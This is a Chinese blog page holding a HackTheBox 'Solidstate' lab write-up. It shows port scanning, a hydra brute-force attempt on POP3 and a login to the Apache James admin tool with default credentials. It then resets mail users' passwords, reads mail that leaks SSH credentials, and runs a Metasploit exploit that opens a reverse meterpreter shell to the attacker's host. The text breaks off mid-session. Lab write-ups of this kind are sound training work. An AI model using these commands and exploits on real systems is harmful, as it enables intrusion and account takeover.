<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="10.10.10.51 信息收集Nmap粗略扫描下，发现好几个端口, 123456789101112131415161718192021222324252627282930313233# nmap 10.10.10.51Nmap scan report for 10.10.10.51Host is up (1.0s latency).Not shown: 995 closed portsPORT">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox：Solidstate笔记">
<meta property="og:url" content="http://unc1e.com/2020/05/07/yuque/HackTheBox%EF%BC%9ASolidstate%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="Unc1e的博客">
<meta property="og:description" content="10.10.10.51 信息收集Nmap粗略扫描下，发现好几个端口, 123456789101112131415161718192021222324252627282930313233# nmap 10.10.10.51Nmap scan report for 10.10.10.51Host is up (1.0s latency).Not shown: 995 closed portsPORT">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1588846004234-2aecdd42-2279-4c38-96bb-c1c9072be69e.png#align=left&display=inline&height=284&margin=%5Bobject%20Object%5D&name=image.png&originHeight=567&originWidth=890&size=160185&status=done&style=none&width=445">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1588846328871-37dfec67-2c35-4702-a15c-5ca5dfae0a70.png#align=left&display=inline&height=310&margin=%5Bobject%20Object%5D&name=image.png&originHeight=620&originWidth=1689&size=496802&status=done&style=none&width=844.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1588926099446-06788da3-a721-4b8f-931a-11b8a777b8eb.png#align=left&display=inline&height=330&margin=%5Bobject%20Object%5D&name=image.png&originHeight=660&originWidth=1008&size=71148&status=done&style=none&width=504">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1588858957254-4923071a-4a96-4e4a-910a-45d5151f1723.png#align=left&display=inline&height=453&margin=%5Bobject%20Object%5D&name=image.png&originHeight=963&originWidth=1587&size=209705&status=done&style=none&width=746">
<meta property="article:published_time" content="2020-05-07T10:01:39.000Z">
<meta property="article:modified_time" content="2020-07-16T02:35:51.892Z">
<meta property="article:author" content="Unc1e">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1588846004234-2aecdd42-2279-4c38-96bb-c1c9072be69e.png#align=left&display=inline&height=284&margin=%5Bobject%20Object%5D&name=image.png&originHeight=567&originWidth=890&size=160185&status=done&style=none&width=445">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://unc1e.com/2020/05/07/yuque/HackTheBox：Solidstate笔记/"/>





  <title>HackTheBox：Solidstate笔记 | Unc1e的博客</title>
  








<meta name="generator" content="Hexo 4.2.1"><link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Unc1e的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://unc1e.com/2020/05/07/yuque/HackTheBox%EF%BC%9ASolidstate%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Unc1e">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Unc1e的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">HackTheBox：Solidstate笔记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-05-07T18:01:39+08:00">
                2020-05-07
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>10.10.10.51<br><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1588846004234-2aecdd42-2279-4c38-96bb-c1c9072be69e.png#align=left&display=inline&height=284&margin=%5Bobject%20Object%5D&name=image.png&originHeight=567&originWidth=890&size=160185&status=done&style=none&width=445" alt="image.png"></p>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><h2 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h2><p>粗略扫描下，发现好几个端口,</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"># nmap 10.10.10.51</span><br><span class="line">Nmap scan report for 10.10.10.51</span><br><span class="line">Host is up (1.0s latency).</span><br><span class="line">Not shown: 995 closed ports</span><br><span class="line">PORT    STATE SERVICE</span><br><span class="line">22/tcp  open  ssh</span><br><span class="line">25/tcp  open  smtp</span><br><span class="line">80/tcp  open  http</span><br><span class="line">110/tcp open  pop3</span><br><span class="line">119/tcp open  nntp</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># 扫描全端口</span><br><span class="line">## Nmap scan report for 10.10.10.51</span><br><span class="line">Host is up (4.8s latency).</span><br><span class="line">Not shown: 64192 closed ports, 1337 filtered ports</span><br><span class="line">PORT     STATE SERVICE    VERSION</span><br><span class="line">22/tcp   open  tcpwrapped</span><br><span class="line">| ssh-hostkey:</span><br><span class="line">|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)</span><br><span class="line">|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)</span><br><span class="line">|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)</span><br><span class="line">25/tcp   open  tcpwrapped</span><br><span class="line">|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.16.122 [10.10.16.122]),</span><br><span class="line">80/tcp   open  tcpwrapped</span><br><span class="line">|_http-server-header: Apache/2.4.25 (Debian)</span><br><span class="line">|_http-title: Home - Solid State Security</span><br><span class="line">110/tcp  open  tcpwrapped</span><br><span class="line">119/tcp  open  tcpwrapped</span><br><span class="line">4555/tcp open  tcpwrapped</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 1134.71 seconds</span><br></pre></td></tr></table></figure>

<p>首页发现一邮箱，试试爆破</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">webadmin@solid-state-security.com</span></span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1588846328871-37dfec67-2c35-4702-a15c-5ca5dfae0a70.png#align=left&display=inline&height=310&margin=%5Bobject%20Object%5D&name=image.png&originHeight=620&originWidth=1689&size=496802&status=done&style=none&width=844.5" alt="image.png"><br>尝试用<code>rockyou.txt</code>和<code>fasttrack.txt</code>爆破 pop3，无果</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"># hydra -l webadmin -P /usr/share/wordlists/rockyou.txt solid-state-security.com pop3 -v</span><br><span class="line"></span><br><span class="line">Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.</span><br><span class="line"></span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-07 17:35:14</span><br><span class="line">[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!</span><br><span class="line">[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore</span><br><span class="line"></span><br><span class="line">[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task</span><br><span class="line">[DATA] attacking pop3://solid-state-security.com:110/</span><br><span class="line">[VERBOSE] Resolving addresses ... [VERBOSE] resolving done</span><br><span class="line">[VERBOSE] CAPABILITY: -ERR[VERBOSE] using POP3 CLEAR LOGIN mechanism</span><br><span class="line">[ERROR] Not an POP3 protocol or service shutdown: (null)</span><br><span class="line">[ERROR] Not an POP3 protocol or service shutdown: (null)</span><br><span class="line">[VERBOSE] Retrying connection for child 5</span><br><span class="line">[VERBOSE] Retrying connection for child 9</span><br><span class="line">[ERROR] Not an POP3 protocol or service shutdown: (null)</span><br><span class="line">[ERROR] Not an POP3 protocol or service shutdown: (null)</span><br><span class="line">[ERROR] Not an POP3 protocol or service shutdown: (null)</span><br><span class="line">[ERROR] Not an POP3 protocol or service shutdown: (null)</span><br><span class="line">[ERROR] Not an POP3 protocol or service shutdown: (null)</span><br><span class="line">[ERROR] Not an POP3 protocol or service shutdown: (null)</span><br><span class="line">[VERBOSE] Retrying connection for child 2</span><br><span class="line">[VERBOSE] Retrying connection for child 7</span><br><span class="line">[VERBOSE] Retrying connection for child 12</span><br><span class="line">[VERBOSE] Retrying connection for child 13</span><br><span class="line">[STATUS] 502.00 tries/min, 502 tries in 00:01h, 14343899 to do in 476:14h, 16 active</span><br><span class="line">[STATUS] 651.67 tries/min, 1955 tries in 00:03h, 14342446 to do in 366:49h, 16 active</span><br><span class="line">^[[A^[[B^[[C^[[C^C[ERROR] Received signal 2, going down ...</span><br><span class="line">^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.</span><br><span class="line"></span><br><span class="line"># # hydra -l webadmin -P /usr/share/wordlists/fasttrack.txt solid-state-security.com pop3 -v</span><br></pre></td></tr></table></figure>

<p>后面全端口的扫描结果也出来了，发现 4555 端口，并且搜索，发现一个 rce</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># searchsploit  james 2.3</span><br><span class="line">-------------------------------- ----------------------------------------</span><br><span class="line"> Exploit Title                  |  Path</span><br><span class="line">                                | (/usr/share/exploitdb/)</span><br><span class="line">-------------------------------- ----------------------------------------</span><br><span class="line">Apache James Server 2.3.2 -</span><br><span class="line">Remote Command Execution        | exploits/linux/remote/35513.py</span><br><span class="line">----------------------------------------------------------- ------------</span><br></pre></td></tr></table></figure>

<p>默认密码是 root-root，并没有反弹 shell<br><del>直接 nc 连进去，</del>尝试了半个小时，发现必须要用 telnet 才能登录（才能互动）</p>
<h2 id="JAMES-Admin-Tool"><a href="#JAMES-Admin-Tool" class="headerlink" title="JAMES Admin Tool"></a>JAMES Admin Tool</h2><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="section"># nc 10.10.10.51 4555</span></span><br><span class="line"></span><br><span class="line">JAMES Remote Administration Tool 2.3.2</span><br><span class="line">Please enter your login and password</span><br><span class="line">Login id:</span><br><span class="line">root</span><br><span class="line">Password:</span><br><span class="line">root</span><br><span class="line">Welcome root. HELP for a list of commands</span><br><span class="line"></span><br><span class="line"><span class="section"># help</span></span><br><span class="line"></span><br><span class="line">Currently implemented commands:</span><br><span class="line">help display this help</span><br><span class="line">listusers display existing accounts</span><br><span class="line">countusers display the number of existing accounts</span><br><span class="line">adduser [<span class="string">username</span>][<span class="symbol">password</span>] add a new user</span><br><span class="line">verify [username] verify if specified user exist</span><br><span class="line">deluser [username] delete existing user</span><br><span class="line">setpassword [<span class="string">username</span>][<span class="symbol">password</span>] sets a user's password</span><br><span class="line">setalias [<span class="string">user</span>][<span class="symbol">alias</span>] locally forwards all email for 'user' to 'alias'</span><br><span class="line">showalias [username] shows a user's current email alias</span><br><span class="line">unsetalias [user] unsets an alias for 'user'</span><br><span class="line">setforwarding [<span class="string">username</span>][<span class="symbol">emailaddress</span>] forwards a user's email to another email address</span><br><span class="line">showforwarding [username] shows a user's current email forwarding</span><br><span class="line">unsetforwarding [username] removes a forward</span><br><span class="line">user [repositoryname] change to another user repository</span><br><span class="line">shutdown kills the current JVM (convenient when James is run as a daemon)</span><br><span class="line">quit close connection</span><br><span class="line"></span><br><span class="line"><span class="section"># listusers</span></span><br><span class="line"></span><br><span class="line">Existing accounts 6</span><br><span class="line">user: james</span><br><span class="line">user: ../../../../../../../../etc/bash_completion.d</span><br><span class="line">user: thomas</span><br><span class="line">user: john</span><br><span class="line">user: mindy</span><br><span class="line">user: mailadmin</span><br></pre></td></tr></table></figure>

<p>在 4445 端口把上面几个用户的密码改了之后, 登录上 pop3</p>
<h1 id="拿-user-权限"><a href="#拿-user-权限" class="headerlink" title="拿 user 权限"></a>拿 user 权限</h1><h2 id="john-的邮箱"><a href="#john-的邮箱" class="headerlink" title="john 的邮箱"></a>john 的邮箱</h2><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="section"># root@localhost:~/HTB/solidstate# telnet 10.10.10.51 110</span></span><br><span class="line"></span><br><span class="line">Trying 10.10.10.51...</span><br><span class="line">Connected to 10.10.10.51.</span><br><span class="line">Escape character is '^]'.</span><br><span class="line">+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready</span><br><span class="line"></span><br><span class="line"><span class="section"># user john</span></span><br><span class="line"></span><br><span class="line">+OK</span><br><span class="line"></span><br><span class="line"><span class="section"># pass john</span></span><br><span class="line"></span><br><span class="line">+OK Welcome john</span><br><span class="line"></span><br><span class="line"><span class="section"># list</span></span><br><span class="line"></span><br><span class="line">+OK 1 743</span><br><span class="line">1 743</span><br><span class="line">.</span><br><span class="line"></span><br><span class="line"><span class="section"># retr 1</span></span><br><span class="line"></span><br><span class="line">+OK Message follows</span><br><span class="line">Return-Path: <span class="xml"><span class="tag">&lt;<span class="name">mailadmin@localhost</span>&gt;</span></span></span><br><span class="line">Message-ID: <span class="xml"><span class="tag">&lt;<span class="name">9564574.1.1503422198108.JavaMail.root@solidstate</span>&gt;</span></span></span><br><span class="line">MIME-Version: 1.0</span><br><span class="line">Content-Type: text/plain; charset=us-ascii</span><br><span class="line">Content-Transfer-Encoding: 7bit</span><br><span class="line">Delivered-To: john@localhost</span><br><span class="line">Received: from 192.168.11.142 ([192.168.11.142])</span><br><span class="line">by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581</span><br><span class="line">for <span class="xml"><span class="tag">&lt;<span class="name">john@localhost</span>&gt;</span></span>;</span><br><span class="line">Tue, 22 Aug 2017 13:16:20 -0400 (EDT)</span><br><span class="line">Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)</span><br><span class="line">From: mailadmin@localhost</span><br><span class="line">Subject: New Hires access</span><br><span class="line">John,</span><br><span class="line"></span><br><span class="line">Can you please restrict mindy's access until she gets read on to the program.</span><br><span class="line">Also make sure that you send her a tempory password to login to her accounts.</span><br><span class="line"></span><br><span class="line">Thank you in advance.</span><br><span class="line"></span><br><span class="line">Respectfully,</span><br><span class="line">James</span><br><span class="line"></span><br><span class="line">.</span><br></pre></td></tr></table></figure>

<p>大意就是发了一个默认密码给一个叫<code>mindy</code>的人</p>
<h2 id="mindy-的邮箱"><a href="#mindy-的邮箱" class="headerlink" title="mindy 的邮箱"></a>mindy 的邮箱</h2><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="section"># telnet 10.10.10.51 110</span></span><br><span class="line"></span><br><span class="line">Trying 10.10.10.51...</span><br><span class="line">Connected to 10.10.10.51.</span><br><span class="line">Escape character is '^]'.</span><br><span class="line">+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready</span><br><span class="line"></span><br><span class="line"><span class="section"># user mindy</span></span><br><span class="line"></span><br><span class="line">+OK</span><br><span class="line"></span><br><span class="line"><span class="section"># pass mindy</span></span><br><span class="line"></span><br><span class="line">+OK Welcome mindy</span><br><span class="line"></span><br><span class="line"><span class="section"># list</span></span><br><span class="line"></span><br><span class="line">+OK 2 1945</span><br><span class="line">1 1109</span><br><span class="line">2 836</span><br><span class="line">.</span><br><span class="line"></span><br><span class="line"><span class="section"># retr</span></span><br><span class="line"></span><br><span class="line">-ERR Usage: RETR [mail number]</span><br><span class="line"></span><br><span class="line"><span class="section"># retr 1</span></span><br><span class="line"></span><br><span class="line">+OK Message follows</span><br><span class="line">Return-Path: <span class="xml"><span class="tag">&lt;<span class="name">mailadmin@localhost</span>&gt;</span></span></span><br><span class="line">Message-ID: <span class="xml"><span class="tag">&lt;<span class="name">5420213.0.1503422039826.JavaMail.root@solidstate</span>&gt;</span></span></span><br><span class="line">MIME-Version: 1.0</span><br><span class="line">Content-Type: text/plain; charset=us-ascii</span><br><span class="line">Content-Transfer-Encoding: 7bit</span><br><span class="line">Delivered-To: mindy@localhost</span><br><span class="line">Received: from 192.168.11.142 ([192.168.11.142])</span><br><span class="line">by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798</span><br><span class="line">for <span class="xml"><span class="tag">&lt;<span class="name">mindy@localhost</span>&gt;</span></span>;</span><br><span class="line">Tue, 22 Aug 2017 13:13:42 -0400 (EDT)</span><br><span class="line">Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)</span><br><span class="line">From: mailadmin@localhost</span><br><span class="line">Subject: Welcome</span><br><span class="line"></span><br><span class="line">Dear Mindy,</span><br><span class="line">Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.</span><br><span class="line"></span><br><span class="line">We are looking forward to you joining our team and your success at Solid State Security.</span><br><span class="line"></span><br><span class="line">Respectfully,</span><br><span class="line">James</span><br><span class="line">.</span><br><span class="line"></span><br><span class="line"><span class="section"># retr 2</span></span><br><span class="line"></span><br><span class="line">+OK Message follows</span><br><span class="line">Return-Path: <span class="xml"><span class="tag">&lt;<span class="name">mailadmin@localhost</span>&gt;</span></span></span><br><span class="line">Message-ID: <span class="xml"><span class="tag">&lt;<span class="name">16744123.2.1503422270399.JavaMail.root@solidstate</span>&gt;</span></span></span><br><span class="line">MIME-Version: 1.0</span><br><span class="line">Content-Type: text/plain; charset=us-ascii</span><br><span class="line">Content-Transfer-Encoding: 7bit</span><br><span class="line">Delivered-To: mindy@localhost</span><br><span class="line">Received: from 192.168.11.142 ([192.168.11.142])</span><br><span class="line">by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581</span><br><span class="line">for <span class="xml"><span class="tag">&lt;<span class="name">mindy@localhost</span>&gt;</span></span>;</span><br><span class="line">Tue, 22 Aug 2017 13:17:28 -0400 (EDT)</span><br><span class="line">Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)</span><br><span class="line">From: mailadmin@localhost</span><br><span class="line">Subject: Your Access</span><br><span class="line"></span><br><span class="line">Dear Mindy,</span><br><span class="line"></span><br><span class="line">Here are your ssh credentials to access the system. Remember to reset your password after your first login.</span><br><span class="line">Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.</span><br><span class="line"></span><br><span class="line">username: mindy</span><br><span class="line">pass: P@55W0rd1!2@</span><br><span class="line"></span><br><span class="line">Respectfully,</span><br><span class="line">James</span><br></pre></td></tr></table></figure>

<p>整挺好——直接得到 user 权限</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">msf5 exploit(linux/smtp/apache<span class="emphasis">_james_</span>exec) &gt; handler -H 10.10.16.122 -P 4443 -p linux/x86/meterpreter/reverse_tcp</span><br><span class="line">msf5 exploit(linux/smtp/apache<span class="emphasis">_james_</span>exec) &gt; exploit -j</span><br><span class="line">[*] Exploit running as background job 6.</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 10.10.16.122:4444</span><br><span class="line">msf5 exploit(linux/smtp/apache<span class="emphasis">_james_</span>exec) &gt; [*] Sending stage (989416 bytes) to 10.10.10.51</span><br><span class="line">[*] 10.10.10.51:25 - Command Stager progress - 100.00% done (773/773 bytes)</span><br><span class="line">[*] 10.10.10.51:25 - Waiting for cron to execute payload...</span><br><span class="line">[*] Meterpreter session 3 opened (10.10.16.122:4444 -&gt; 10.10.10.51:42336) at 2020-05-07 20:54:27 +0000</span><br><span class="line">msf5 exploit(linux/smtp/apache<span class="emphasis">_james_</span>exec) &gt; sessions -l</span><br><span class="line"></span><br><span class="line"><span class="section"># Active sessions</span></span><br><span class="line"></span><br><span class="line">Id Name Type Information Connection</span><br><span class="line"></span><br><span class="line">---</span><br><span class="line"></span><br><span class="line">3 meterpreter x86/linux 10.10.16.122:4444 -&gt; 10.10.10.51:42336 (10.10.10.51)</span><br><span class="line"></span><br><span class="line">msf5 exploit(linux/smtp/apache<span class="emphasis">_james_</span>exec) &gt; sessions 3</span><br><span class="line">[*] Starting interaction with 3...</span><br><span class="line"></span><br><span class="line">meterpreter &gt; shell</span><br><span class="line">Process 1962 created.</span><br><span class="line">Channel 1 created.</span><br><span class="line">whoami</span><br><span 